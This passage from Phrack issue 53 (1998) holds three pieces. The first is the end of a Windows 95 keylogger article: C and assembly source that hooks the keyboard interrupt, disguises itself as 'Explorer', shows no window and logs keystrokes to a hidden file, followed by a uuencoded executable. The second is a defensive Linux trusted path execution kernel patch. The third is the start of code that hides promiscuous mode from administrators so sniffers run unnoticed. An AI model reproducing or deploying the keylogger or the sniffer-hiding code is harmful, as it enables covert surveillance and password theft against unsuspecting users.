                                // very odd program. Try 0f9h.

/************* Global Variables in DATA SEGment ****************/
HWND hwnd;                  // used by newint9()
unsigned int offsetint;     // old int 9 offset
unsigned int selectorint;   // old int 9 selector
unsigned char scancode;     // scan code from keyboard
//WndProc
char sLogPath[160];
int hLogFile;
long lLogPos;
char sLogBuf[10];
//WinMain
char szAppName[]="Explorer";
MSG msg;
WNDCLASS wndclass;
/***************************************************************/
//
//__________________________
void interrupt newint9(void)
//This is the new int 9 (keyboard) code
// It is a hardware Interrupt Service Routine. (ISR)
{
  scancode=inportb(0x60);
  if((scancode<0x40)&&(scancode!=0x2a)) {
    if(peekb(0x0040, 0x0017)&0x40) { //if CAPSLOCK is active
      // Now we have to flip UPPER/lower state of A-Z only! 16-25,30-38,44-50
      if(((scancode>15)&&(scancode<26))||((scancode>29)&&(scancode<39))||
         ((scancode>43)&&(scancode<51))) //Phew!
        scancode^=128; //bit 7 indicates SHIFT state to CONVERT.C program
    }//if CAPSLOCK
    if(peekb(0x0040, 0x0017)&3) //if any shift key is pressed...
      scancode^=128; //bit 7 indicates SHIFT state to CONVERT.C program
    if(scancode==26)  //Nasty ^Z bug in convert program
      scancode=129;   //New code for "["
    //Unlike other Windows functions, an application may call PostMessage
    // at the hardware interrupt level. (Thankyou Micr$oft!)
    PostMessage(hwnd, WM_USER, scancode, 0L); //Send scancode to WndProc()
  }//if scancode in range
  asm {  //This is very compiler specific, & kinda ugly!
    pop bp
    pop di
    pop si
    pop ds
    pop es
    pop dx
    pop cx
    pop bx
    pop ax
    int NEWVECT // Call the original int 9 Keyboard routine
    iret        // and return from interrupt
  }
}//end newint9

//This is the "callback" function that handles all messages to our "window"
//_____________________________________________________________________
long FAR PASCAL WndProc(HWND hwnd,WORD message,WORD wParam,LONG lParam)
{
  //asm int 3;   //For Soft-ice debugging
  //asm int 18h; //For Soft-ice debugging
  switch(message) {
    case WM_CREATE:
      // hook the keyboard hardware interrupt
      asm {
        pusha
        push es
        push ds
        // Now get the old INT 9 vector and save it...
        mov al,9
        mov ah,35h              // into ES:BX
        int 21h
        push es
        pop ax
        mov offsetint,bx        // save old vector in data segment
        mov selectorint,ax      //        /
        mov dx,OFFSET newint9   // This is an OFFSET in the CODE segment
        push cs
        pop ds                  // New vector in DS:DX
        mov al,9
        mov ah,25h
        int 21h                 // Set new int 9 vector
        pop ds                  // get data seg for this program
        push ds
        // now hook unused vector to call old int 9 routine
        mov dx,offsetint
        mov ax,selectorint
        mov ds,ax
        mov ah,25h
        mov al,NEWVECT
        int 21h                 // Installation now finished
        pop ds
        pop es
        popa
      } // end of asm

      //Get path to WINDOWS directory
      if(GetWindowsDirectory(sLogPath,150)==0) return 0;
      //Put LOGFILE on end of path
      strcat(sLogPath,"\\SYSTEM\\");
      strcat(sLogPath,LOGFILE);
      do {
        // See if LOGFILE exists
        hLogFile=_lopen(sLogPath,OF_READ);
        if(hLogFile==-1) {
          // We have to Create it
          hLogFile=_lcreat(sLogPath,HIDDEN);
          if(hLogFile==-1) return 0; //Die quietly if can't create LOGFILE
        }
        _lclose(hLogFile);
        // Now it exists and (hopefully) is hidden....
        hLogFile=_lopen(sLogPath,OF_READWRITE); //Open for business!
        if(hLogFile==-1) return 0;  //Die quietly if can't open LOGFILE
        lLogPos=_llseek(hLogFile,0L,SEEK_END); //Seek to the end of the file
        if(lLogPos==-1) return 0;   //Die quietly if can't seek to end
        if(lLogPos>LOGMAXSIZE) {    //Let's not fill the harddrive...
          _lclose(hLogFile);
          _chmod(sLogPath,1,0);
          if(unlink(sLogPath)) return 0; //delete or die
        }//if file too big
      } while(lLogPos>LOGMAXSIZE);
      break;

    case WM_USER:
      // A scan code....
      *sLogBuf=(char)wParam;
      _write(hLogFile,sLogBuf,1);
      break;

    case WM_ENDSESSION: // Is windows "restarting" ?
    case WM_DESTROY:    // Or are we being killed ?
      asm {
        push dx
        push ds
        mov dx,offsetint
        mov ds,selectorint
        mov ax,2509h
        int 21h             //point int 09 vector back to old
        pop ds
        pop dx
      }
      _lclose(hLogFile);
      PostQuitMessage(0);
      return(0);
  } //end switch

  //This handles all the messages that we don't want to know about
  return DefWindowProc(hwnd,message,wParam,lParam);
}//end WndProc

/**********************************************************/
int PASCAL WinMain (HANDLE hInstance, HANDLE hPrevInstance,
                    LPSTR lpszCmdParam, int nCmdShow)
{
  if (!hPrevInstance) { //If there is no previous instance running...
    wndclass.style         = CS_HREDRAW | CS_VREDRAW;
    wndclass.lpfnWndProc   = WndProc; //function that handles messages
                                      // for this window class
    wndclass.cbClsExtra    = 0;
    wndclass.cbWndExtra    = 0;
    wndclass.hInstance     = hInstance;
    wndclass.hIcon         = NULL;
    wndclass.hCursor       = NULL;
    wndclass.hbrBackground = NULL;
    wndclass.lpszClassName = szAppName;
    RegisterClass (&wndclass);

    // NOTE: the argument list of this call was truncated in the source;
    // the values below are a plausible reconstruction, not the original.
    hwnd = CreateWindow(szAppName,  //Create a window
                        szAppName,  //window caption
                        WS_OVERLAPPEDWINDOW,
                        CW_USEDEFAULT, CW_USEDEFAULT,
                        CW_USEDEFAULT, CW_USEDEFAULT,
                        NULL, NULL, hInstance, NULL);

    //ShowWindow(hwnd,nCmdShow);    //We don't want no
    //UpdateWindow(hwnd);           // stinking window!

    while (GetMessage(&msg,NULL,0,0)) {
      TranslateMessage(&msg);
      DispatchMessage(&msg);
    }
  }//if no previous instance of this program is running...
  return msg.wParam;    //Program terminates here after falling out
                        // of the while() loop.
}//End of WinMain
<-->
<++> EX/win95log/W95KLOG.DEF
;NAME is what shows in CTRL-ALT-DEL Task list...
hmmmm NAME Explorer DESCRIPTION 'Explorer' EXETYPE WINDOWS CODE PRELOAD FIXED DATA PRELOAD FIXED SHARED HEAPSIZE 2048 STACKSIZE 8096 <--> <++> EX/win95log/W95KLOG.EXE.uue begin 600 W95KLOG.EXE M35H"`08````$``\`__\``+@`````````0``````````````````````````` M````````````````````D````+H0``X?M`G-(;@!3,TAD)!4:&ES('!R;V=R M86T@;75S="!B92!R=6X@=6YD97(@36EC<F]S;V9T(%=I;F1O=W,N#0HD```` M````````````3D4%"FT``@```````@,"```(H!\```$````"``(``@`,`$`` M4`!0`%P`8`#_```````)`````@@!``<``````P(`U05`#=4%!@`F`F$,)@(( M17AP;&]R97(````!``@```9+15).14P$55-%4@``"$5X<&QO<F5R```````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````````)K__P``"\!U`^G$ M`(P&%@")'AP`B38:`(D^&`")%AX`N/__4)K__P``,\`>%C8!HS0! 
M@SXV`?]U#H,^-`'_=0<STC/`Z:``@SXV`2!\,7\'@SXT`0!V*/\V.`&:__\` M`&H`:@%H1`'H?@&#Q`9H1`'H+P)$1`O`=`8STC/`ZVB#/C8!('X#Z3W_=4J# M/C0!`'8#Z3'_ZSZ*1@JB.@%J`6@Z`?\V.`'H#P*#Q`;K)U(>BQ8P`8X>Y`&X M"27-(1]:_S8X`9K__P``:@":__\``#/2,\#K$O]V#E;_=@K_=@C_=@::__\` M`%X?74W*"@!5B^Q6BW8,@WX*`'0#Z98`QP86`0,`C`X:`<<&&`'__\<&'`$` M`,<&'@$``(DV(`''!B(!``#'!B0!``#'!B8!``",'BX!QP8L`50`'F@6`9K_ M_P``'FA4`!YH5`!HSP!J`&@`@&@`@&@`@&@`@&H`:@!6:@!J`)K__P``HQ0! MZQ(>:`(!FO__```>:`(!FO__```>:`(!:@!J`&H`FO__```+P'7;H08!7EW" M"@!5B^Q=PU6+[.L*BQYX`-'C_Y?F`:%X`/\.>``+P'7K_W8$Z!#\65W#58OL M@SYX`"!U!;@!`.L3BQYX`-'CBT8$B8?F`?\&>``SP%W#58OLBTX(M$.*1@:+ M5@3-(7(#D>L$4.@"`%W#58OL5HMV!`OV?!6#_EA^`[Y7`(DVH@"*A*0`F(OP MZQ&+QO?8B_"#_B-_Y<<&H@#__XDV$`"X__]>7<("`%6+[(M>!-'C@:=Z`/_] MM$**1@J+7@2+3@B+5@;-(7("ZP50Z)W_F5W#58OL5E?\BWX$'@>+US+`N?__ M\JZ-=?^+?@:Y___RKO?1*_F']_?&`0!T`J1)T>GSI7,!I))?7EW#58OLM$&+ M5@3-(7($,\#K!%#H3?]=PU6+[(M>!-'C]X=Z```(=!.X`@!0,\`STE!2_W8$ MZ&C_@\0(M$"+7@2+3@B+5@;-(7(/4(M>!-'C@8]Z```06.L$4.@&_UW#&0`# M`0$``0!;``,!)0`!`!<``P$\``$`'@`#`44``@`%``,!9``!`(0``P'%``$` M&``#`6($`@!L``,!4P0"`'(``P%*!`(`<0`#`3P$`@`I``,!%00"`#D`!0#B M`P$`!P(#`;D#`@!K``,!H0,"``8``P&:`P$`40`#`3(#`0!1``,!_0(!`%0` M`P'=`@$`50`#`=("`0!1``,!N`(!`%,``P&C`@$`50`#`74"`0"&``4`3P(! M`%P!`P'M`0(`;@`"`&8!`@!4```````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M````#"X`17AP;&]R97(`7%-94U1%35P`4$]715)8+D1,3```<@1R!'($```! 
M(`(@`B`$H`*@________________________________________````$P(" M!`4&"`@(%!4%$_\6!1$"_________________P4%____________________ M_P__(P+_#_____\3__\"`@4/`O___Q/__________R/_____(_\3_P`````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` !```` ` end <--> ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 08 of 15 -------------------------[ Linux Trusted Path Execution Redux --------[ Krzysztof G. Baranowski <kgb@manjak.knm.org.pl> ---[ Introduction The idea of trusted path execution is good, however the implementation which appeared in Phrack 52-06 may be a major annoyance even to the root itself, eg. old good INN newsserver keeps most of its control scripts in directories owned by news, so it would be not possible to run them, when the original TPE patch was applied. 
A better solution would be to have some kind of access list where one could add and delete users allowed to run programs. This can be achieved very easily: all you have to do is write a kernel device driver, which allows you to control the access list from userspace by using ioctl() syscalls.

---[ Implementation

The whole implementation consists of a kernel patch and a userspace program. The patch adds a new driver to the kernel source tree and performs a few minor modifications. The driver registers itself as a character device called "tpe", with a major number of 40, so in /dev you must create a char device "tpe" with a major number of 40 and a minor number of 0 (mknod /dev/tpe c 40 0). The most important parts of the driver are:

a) the access list of non-root users allowed to run arbitrary programs (empty by default; MAX_USERS can be increased in include/linux/tpe.h),

b) the tpe_verify() function, which checks whether a user should be allowed to run a program and optionally logs TPE violation attempts. The check of whether tpe_verify() should be used is done in fs/exec.c, before the program is executed. If the user is not root, we perform two checks and allow execution only in two cases:

1) if the directory is owned by root and is not group or world writable (this check covers binaries located in /bin, /usr/bin, /usr/local/bin/, etc...).

2) If the above check fails, we allow the program to run only if the user is on our access list, and the program is located in a directory owned by that user which is not group or world writable.

All other binaries are considered untrusted and will not be allowed to run. The logging of TPE violation attempts is a sysctl option (disabled by default). You can control it via the /proc filesystem: echo 1 > /proc/sys/kernel/tpe will enable the logging; echo 0 > /proc/sys/kernel/tpe will turn it off. All these messages are logged at KERN_ALERT priority.

c) the tpe_ioctl() function, which is our gate to/from userspace.
The driver supports three ioctls: 1) TPE_SCSETENT - add UID to the access list, 2) TPE_SCDELENT - delete UID from the access list, 3) TPE_SCGETENT - get entry from the access list. Only root is allowed to perform these ioctl()s. The userspace program called "tpadm" is very simple. It opens /dev/tpe and performs an ioctl() with arguments as given by user. ---[ In Conclusion Well, that's all. Except for the legal blurb [1]: "As usual, there are two main things to consider: 1. You get what you pay for. 2. It this I'd like to hear of it. Not only to have a great laugh, but also to make sure that you're the last RTFMing person to screw up. In short, e-mail your suggestions, corrections and / or horror stories to <kgb@manjak.knm.org.pl>." Krzysztof G. Baranowski - President of the Harmless Manyacs' Club <prezes@manjak.knm.org.pl> -- [1] My favorite one, taken from Linux kernel Documentation/sysctl/README, written by Rik van Riel <H.H.vanRiel@fys.ruu.nl>. ----[ The code <++> EX/tpe-0.02/Makefile # # Makefile for the Linux TPE Suite. # Copyright (C) 1998 Krzysztof G. Baranowski. All rights reserved. # # Change this to suit your requirements CC = gcc CFLAGS = -Wall -Wstrict-prototypes -g -O2 -fomit-frame-pointer \ -pipe -m386 all: tpadm patch tpadm: tpadm.c $(CC) $(CFLAGS) -o tpadm tpadm.c @strip tpadm patch: @echo @echo "You must patch, reconfigure, recompile your kernel" @echo "and create /dev/tpe (character, major 40, minor 0)" @echo clean: rm -f *.o core tpadm <--> <++> EX/tpe-0.02/tpeadm.c /* * tpe.c - tpe administrator * * 20:27:33 CEST 1998 * Initial release for alpha testing. * Revision 0.02: Sat Apr 11 21:58:06 CEST 1998 * Minor cosmetic fixes. 
* */ static const char *version = "0.02"; #include <linux/tpe.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <unistd.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <ctype.h> #include <stdio.h> #include <fcntl.h> #include <pwd.h> void banner(void) { fprintf(stdout, "TPE Administrator, version %s\n", version); fprintf(stdout, "Copyright (C) 1998 Krzysztof G. Baranowski. " "All rights reserved.\n"); fprintf(stdout, "Report bugs to <kgb@manjak.knm.org.pl>\n"); } void usage(const char *name) { banner(); fprintf(stdout, "\nUsage:\n\t%s command\n", name); fprintf(stdout, "\nCommands:\n" " -a username\t\tadd username to the access list\n" " -d username\t\tdelete username from the access list\n" " -s\t\t\tshow access list\n" " -h\t\t\tshow help\n" " -v\t\t\tshow version\n"); } void print_pwd(int pid) { struct passwd *pwd; pwd = getpwuid(pid); if (pwd != NULL) fprintf(stdout, " %d\t%s\t %s \n", pwd->pw_uid, pwd->pw_name, pwd->pw_gecos); } void print_entries(int fd) { int uid, i = 0; fprintf(stdout, "\n UID\tName\t Gecos \n"); fprintf(stdout, "-------------------------\n"); while (i < MAX_USERS) { uid = ioctl(fd, TPE_SCGETENT, i); if (uid > 0) print_pwd(uid); i++; } fprintf(stdout, "\n"); } int name2uid(const char *name) { struct passwd *pwd; pwd = getpwnam(name); if (pwd != NULL) return pwd->pw_uid; else { fprintf(stderr, "%s: no such user.\n", name); exit(EXIT_FAILURE); } } int add_entry(int fd, int uid) { int ret; errno = 0; ret = ioctl(fd, TPE_SCSETENT, uid); if (ret < 0) { fprintf(stderr, "Couldn't add entry: %s\n", strerror(errno)); exit(EXIT_FAILURE); } return 0; } int del_entry(int fd, int uid) { int ret; errno = 0; ret = ioctl(fd, TPE_SCDELENT, uid); if (ret < 0) { fprintf(stderr, "Couldn't delete entry: %s\n", strerror(errno)); exit(EXIT_FAILURE); } return 0; } int main(int argc, char **argv) { const char *name = "/dev/tpe"; char *add_arg = NULL; char *del_arg = NULL; int fd, c; errno = 0; if (argc <= 1) { 
fprintf(stderr, "%s: no command specified\n", argv[0]); fprintf(stderr, "Try `%s -h' for more information\n", argv[0]); exit(EXIT_FAILURE); } fd = open(name, O_RDWR); if (fd < 0) { fprintf(stderr, "Couldn't open file %s; %s\n", \ name, strerror(errno)); exit(EXIT_FAILURE); } opterr = 0; while ((c = getopt(argc, argv, "a:d:svh")) != EOF) switch (c) { case 'a': add_arg = optarg; add_entry(fd, name2uid(add_arg)); break; case 'd': del_arg = optarg; del_entry(fd, name2uid(del_arg)); break; case 's': print_entries(fd); break; case 'v': banner(); break; case 'h': usage(argv[0]); break; default : fprintf(stderr, "%s: illegal option\n", argv[0]); fprintf(stderr, "Try `%s -h' for more information\n", argv[0]); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } <--> <++> EX/tpe-0.02/kernel-tpe-2.0.32.diff diff -urN linux-2.0.32/Documentation/Configure.help linux/Documentation/Configure.help --- linux-2.0.32/Documentation/Configure.help Sat Sep 6 05:43:58 1997 +++ linux/Documentation/Configure.help Sat Apr 11 21:30:40 1998 @@ -3338,6 +3338,27 @@ serial mice, modems and similar devices connecting to the standard serial ports. . + A list of non-root users allowed to run binaries can be modified + by using program "tpadm". You should have received it with this + patch. If not please visit, + mail the author - Krzysztof G. Baranowski <kgb@manjak.knm.org.pl>, + or write it itself :-). This driver has been written as an enhancement + to route's <route@infonexus.cm> original patch. (a check in do_execve() + in fs/exec.c for trusted directories, ie. root owned and not group/world + writable). This option is useless on a single user machine. + Logging of trusted path execution violation is configurable via /proc + filesystem and turned off by default, to turn it on run you must run: + "echo 1 > /proc/sys/kernel/tpe". To turn it off: "echo 0 > /proc/sys/..." 
+ Digiboard PC/Xx Support CONFIG_DIGI This is a driver for the Digiboard PC/Xe, PC/Xi, and PC/Xeve cards diff -urN linux-2.0.32/drivers/char/Config.in linux/drivers/char/Config.in --- linux-2.0.32/drivers/char/Config.in Tue Aug 12 22:06:54 1997 +++ linux/drivers/char/Config.in Sat Apr 11 21:30:53 1998 @@ -5,6 +5,9 @@ comment 'Character devices' tristate 'Standard/generic serial support' CONFIG_SERIAL +if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then + bool 'Trusted Path Execution (EXPERIMENTAL)' CONFIG_TPE +fi bool 'Digiboard PC/Xx Support' CONFIG_DIGI tristate 'Cyclades async mux support' CONFIG_CYCLADES bool 'Stallion multiport serial support' CONFIG_STALDRV diff -urN linux-2.0.32/drivers/char/Makefile linux/drivers/char/Makefile --- linux-2.0.32/drivers/char/Makefile Tue Aug 12 22:06:54 1997 +++ linux/drivers/char/Makefile Thu Apr 9 15:34:46 1998 @@ -34,6 +34,10 @@ endif endif +ifeq ($(CONFIG_TPE),y) +L_OBJS += tpe.o +endif + ifndef CONFIG_SUN_KEYBOARD L_OBJS += keyboard.o defkeymap.o endif diff -urN linux-2.0.32/drivers/char/tpe.c linux/drivers/char/tpe.c --- linux-2.0.32/drivers/char/tpe.c Thu Jan 1 01:00:00 1970 +++ linux/drivers/char/tpe.c Sat Apr 11 22:06:36 1998 @@ -0,0 +1,185 @@ +/* + * tpe.c - tpe driver + * + * 18:31:55 CEST 1998 + * Initial release for alpha testing. + * Revision 0.02: Sat Apr 11 21:32:33 CEST 1998 + * Replaced CONFIG_TPE_LOG with sysctl option. 
+ * + */ + +static const char *version = "0.02"; + +#include <linux/version.h> +#include <linux/module.h> +#include <linux/kernel.h> +#include <linux/sched.h> +#include <linux/config.h> +#include <linux/tpe.h> +#include <linux/mm.h> +#include <linux/fs.h> + +static const char *tpe_dev = "tpe"; +static unsigned int tpe_major = 40; +static int tpe_users[MAX_USERS]; +int tpe_log = 0; /* sysctl boolean */ + +#if 0 +static void print_report(const char *info) +{ + int i = 0; + + printk("Report: %s\n", info); + while (i < MAX_USERS) { + printk("tpe_users[%d] = %d\n", i, tpe_users[i]); + i++; + } +} +#endif + +static int is_on_list(int uid) +{ + int i; + + for (i = 0; i < MAX_USERS; i++) { + if (tpe_users[i] == uid) + return 0; + } + return -1; +} + +int tpe_verify(unsigned short uid, struct inode *d_ino) +{ + if (((d_ino->i_mode & (S_IWGRP | S_IWOTH)) == 0) && (d_ino->i_uid == 0)) + return 0; + if ((is_on_list(uid) == 0) && (d_ino->i_uid == uid) && + (d_ino->i_mode & (S_IWGRP | S_IWOTH)) == 0) + return 0; + + if (tpe_log) + security_alert("Trusted path execution violation"); + return -1; +} + +static int tpe_find_entry(int uid) +{ + int i = 0; + + while (tpe_users[i] != uid && i < MAX_USERS) + i++; + if (i >= MAX_USERS) + return -1; + else + return i; +} + +static void tpe_revalidate(void) +{ + int temp[MAX_USERS]; + int i, j = 0; + + memset(temp, 0, sizeof(temp)); + for (i = 0; i < MAX_USERS; i++) { + if (tpe_users[i] != 0) { + temp[j] = tpe_users[i]; + j++; + } + } + memset(tpe_users, 0, sizeof(tpe_users)); + memcpy(tpe_users, temp, sizeof(temp)); +} + +static int add_entry(int uid) +{ + int i; + + if (uid <= 0) + return -EBADF; + if (!is_on_list(uid)) + return -EEXIST; + if ((i = tpe_find_entry(0)) != -1) { + tpe_users[i] = uid; + tpe_revalidate(); + return 0; + } else + return -ENOSPC; +} + +static int del_entry(int uid) +{ + int i; + + if (uid <= 0) + return -EBADF; + if (is_on_list(uid)) + return -EBADF; + i = tpe_find_entry(uid); + tpe_users[i] = 0; + 
tpe_revalidate(); + return 0; +} + +static int tpe_ioctl(struct inode *inode, struct file *file, + unsigned int cmd, unsigned long arg) +{ + int argc = (int) arg; + int retval; + + if (!suser()) + return -EPERM; + switch (cmd) { + case TPE_SCSETENT: + retval = add_entry(argc); + return retval; + case TPE_SCDELENT: + retval = del_entry(argc); + return retval; + case TPE_SCGETENT: + return tpe_users[argc]; + default: + return -EINVAL; + } +} + +static int tpe_open(struct inode *inode, struct file *file) +{ + return 0; +} + +static void tpe_close(struct inode *inode, struct file *file) +{ + /* dummy */ +} + +static struct file_operations tpe_fops = { + NULL, /* llseek */ + NULL, /* read */ + NULL, /* write */ + NULL, /* readdir */ + NULL, /* select */ + tpe_ioctl, /* ioctl*/ + NULL, /* mmap */ + tpe_open, /* open */ + tpe_close, /* release */ +}; + +int tpe_init(void) +{ + int result; + + tpe_revalidate(); + if ((result = register_chrdev(tpe_major, tpe_dev, &tpe_fops)) != 0) + return result; + printk(KERN_INFO "TPE %s subsystem initialized... " + "(C) 1998 Krzysztof G. 
Baranowski\n", version); + return 0; +} diff -urN linux-2.0.32/drivers/char/tty_io.c linux/drivers/char/tty_io.c --- linux-2.0.32/drivers/char/tty_io.c Tue Sep 16 18:36:49 1997 +++ linux/drivers/char/tty_io.c Thu Apr 9 15:34:46 1998 @@ -2030,6 +2030,9 @@ #ifdef CONFIG_SERIAL rs_init(); #endif +#ifdef CONFIG_TPE + tpe_init(); +#endif #ifdef CONFIG_SCC scc_init(); #endif diff -urN linux-2.0.32/fs/exec.c linux/fs/exec.c --- linux-2.0.32/fs/exec.c Fri Nov 7 18:57:30 1997 +++ linux/fs/exec.c Fri Apr 10 14:02:02 1998 @@ -47,6 +47,11 @@ #ifdef CONFIG_KERNELD #include <linux/kerneld.h> #endif +#ifdef CONFIG_TPE +extern int tpe_verify(unsigned short uid, struct inode *d_ino); +extern int dir_namei(const char *pathname, int *namelen, const char **name, + struct inode *base, struct inode **res_inode); +#endif asmlinkage int sys_exit(int exit_code); asmlinkage int sys_brk(unsigned long); @@ -652,12 +657,29 @@ + */ + if (!suser()) { + dir_namei(filename, &namelen, &basename, NULL, &dir); + if (tpe_verify(current->uid, dir)) + return -EACCES; + } +#endif /* CONFIG_TPE */ + retval = open_namei(filename, 0, 0, &bprm.inode, NULL); if (retval) return retval; diff -urN linux-2.0.32/fs/namei.c linux/fs/namei.c --- linux-2.0.32/fs/namei.c Sun Aug 17 01:23:19 1997 +++ linux/fs/namei.c Thu Apr 9 15:34:46 1998 @@ -216,8 +216; diff -urN linux-2.0.32/include/linux/sysctl.h linux/include/linux/sysctl.h --- linux-2.0.32/include/linux/sysctl.h Tue Aug 12 23:06:35 1997 +++ linux/include/linux/sysctl.h Sat Apr 11 22:04:13 1998 @@ -61,6 +61,7 @@ #define KERN_NFSRADDRS 18 /* NFS root addresses */ #define KERN_JAVA_INTERPRETER 19 /* path to Java(tm) interpreter */ #define KERN_JAVA_APPLETVIEWER 20 /* path to Java(tm) appletviewer */ +#define KERN_TPE 21 /* TPE logging */ /* CTL_VM names: */ #define VM_SWAPCTL 1 /* struct: Set vm swapping control */ diff -urN linux-2.0.32/include/linux/tpe.h linux/include/linux/tpe.h --- linux-2.0.32/include/linux/tpe.h Thu Jan 1 01:00:00 1970 +++ 
linux/include/linux/tpe.h Thu Apr 9 15:34:46 1998 @@ -0,0 +1,47 @@ +/* + * tpe.h - misc common stuff + * + *. + * + */ + +#ifndef __TPE_H__ +#define __TPE_H__ + +#ifdef __KERNEL__ +/* Taken from Solar Designers' <solar@false.com> non executable stack patch */ +__ */ + +/* size of tpe_users array */ +#define MAX_USERS 32 + +/* ioctl */ +#define TPE_SCSETENT 0x3137 +#define TPE_SCDELENT 0x3138 +#define TPE_SCGETENT 0x3139 + +#endif /* __TPE_H__ */ diff -urN linux-2.0.32/include/linux/tty.h linux/include/linux/tty.h --- linux-2.0.32/include/linux/tty.h Tue Nov 18 20:46:44 1997 +++ linux/include/linux/tty.h Sat Apr 11 21:45:20 1998 @@ -283,6 +283,7 @@ extern unsigned long con_init(unsigned long); extern int rs_init(void); +extern int tpe_init(void); extern int lp_init(void); extern int pty_init(void); extern int tty_init(void); diff -urN linux-2.0.32/kernel/sysctl.c linux/kernel/sysctl.c --- linux-2.0.32/kernel/sysctl.c Thu Aug 14 00:02:42 1997 +++ linux/kernel/sysctl.c Sat Apr 11 21:40:03 1998 @@ -26,6 +26,9 @@ /* External variables not in a header file. 
*/ extern int panic_timeout; +#ifdef CONFIG_TPE +extern int tpe_log; +#endif #ifdef CONFIG_ROOT_NFS #include <linux/nfs_fs.h> @@ -147,6 +150,10 @@ 64, 0644, NULL, &proc_dostring, &sysctl_string }, {KERN_JAVA_APPLETVIEWER, "java-appletviewer", binfmt_java_appletviewer, 64, 0644, NULL, &proc_dostring, &sysctl_string }, +#endif +#ifdef CONFIG_TPE + {KERN_TPE, "tpe", &tpe_log, sizeof(int), + 0644, NULL, &proc_dointvec}, #endif {0} }; <--> ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 10 of 15 -------------------------[ Interface Promiscuity Obscurity --------[ apk <apk@itl.waw.pl> ----[ INTRODUCTION Normally, when you put an interface into promiscuous mode, it sets a flag in the device interface structure telling the world (or anyone who wants to check) that the device is, indeed, in promiscuous mode. This is, of course, annoying to those of you who want to obscure this fact from prying administrative eyes. Behold, intrepid hacker, your salvation is at hand. The following programs for FreeBSD, Linux, HP-UX, IRIX and Solaris allow you to obscure the IFF_PROMISC bit and run all your wonderful little packet sniffers incognito... ----[ IMPLEMENTATION DETAILS Usage of the code is simple. After you put the interface into promiscuous mode, you can clear the IFF_PROMISC flag with `./i <interface> 0` and reset the flag with `./i <interface> 1`. Note that these programs only change the interface's flag value; they don't affect the NIC's status. On systems which allow setting promiscuous mode by SIOCSIFFLAGS, however, any call to SIOCSIFFLAGS will make the change take effect (e.g. after clearing the promisc flag, 'ifconfig <interface> up' will really turn off promiscuous mode). Systems for which the above is true are: FreeBSD, Linux, Irix.
On these three you can run a sniffer in non-promiscuous mode, and then some time later set IFF_PROMISC on the interface, then with the above command set promiscuous mode for the interface. This is most useful on FreeBSD because in doing this you won't get that annoying `promiscuous mode enabled for <interface>' message in the dmesg buffer (it's only logged when you enable promiscuous mode via bpf by BIOCPROMISC). On Solaris, every alias has its own flags, so you can set flags for any alias: 'interface[:<alias number>]' (because Solaris doesn't set IFF_PROMISC when you turn on promiscuous mode using DLPI you don't need this program however). ----[ THE CODE <++> EX/promisc/freebsd-p.c /* * promiscuous flag changer v0.1, apk * FreeBSD version, compile with -lkvm * * usage: promisc [interface 0|1] * * note: look at README for notes */ #ifdef __FreeBSD__ # include <osreldate.h> # if __FreeBSD_version >= 300000 # define FBSD3 # endif #endif #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <net/if.h> #ifdef FBSD3 # include <net/if_var.h> #endif OACTIVE\14SIMPLEX\15LINK0\16LINK1\17LINK2" \ "\20MULTICAST" struct nlist nl[] = { { "_ifnet" }, #define N_IFNET[]) { #ifdef FBSD3 struct ifnethead ifh; #endif struct ifnet ifn, *ifp; char ifname[IFNAMSIZ]; int unit, promisc, i, any; char *interface, *cp; kvm_t *kd;_IFNET].n_type == 0) { printf("Cannot find symbol: %s\n", nl[N_IFNET].n_name); exit(1); } #ifdef FBSD3 if (kread(kd, nl[N_IFNET].n_value, &ifh, sizeof(ifh)) == -1) { perror("kread"); exit(1); } ifp = ifh.tqh_first; #else if (kread(kd, nl[N_IFNET].n_value, &ifp, sizeof(ifp)) == -1) { perror("kread"); exit(1); } if (kread(kd, (u_long)ifp, &ifp, sizeof(ifp)) == -1) { perror("kread"); exit(1); } #endif #ifdef FBSD3 for (; ifp; ifp = ifn.if_link.tqe_next) { #else for (; ifp; ifp = ifn.if_next) { #endif if (kread(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) { perror("kread"); break; } if (kread(kd, (u_long)ifn.if_name, ifname, sizeof(ifname)) == -1) {
